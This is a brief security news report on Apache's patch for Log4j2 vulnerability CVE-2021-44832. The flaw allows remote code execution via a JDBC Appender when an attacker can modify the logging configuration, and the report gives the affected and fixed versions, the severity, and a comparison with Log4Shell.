The Apache Software Foundation has released a new security update to address another Log4j vulnerability (CVE-2021-44832) where Log4j2 is vulnerable to remote code execution (RCE) via JDBC Appender when an attacker controls a configuration file.
“Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2,” Apache stated in the new advisory published Tuesday.
Apache provided additional details on the issue via LOG4J2-3293 post. The CVE-2021-44832 is rated Moderate severity and has a CVSS base score of 6.6. No known active exploits in the wild were known at the time of original advisory.
This recent flaw is not as severe as Log4Shell RCE vulnerability CVE-2021-44228 or CVE-2021-45046 since an attacker would need local privileges on a target system in order to gain access to the configuration file.
However, actors could abuse this vulnerability in post-exploitation activities.
- Palo Alto Networks offers proactive protections against Apache Log4j vulnerability with Threat Prevention
- Researchers discover Critical RCE 0-day “Log4Shell” vulnerability in Apache Log4j logging utility (update)
- Apache patches 2 vulnerabilities in HTTP Server 2.4.51
- Apache releases new Log4k security update to fix another RCE vulnerability (CVE-2021-45046)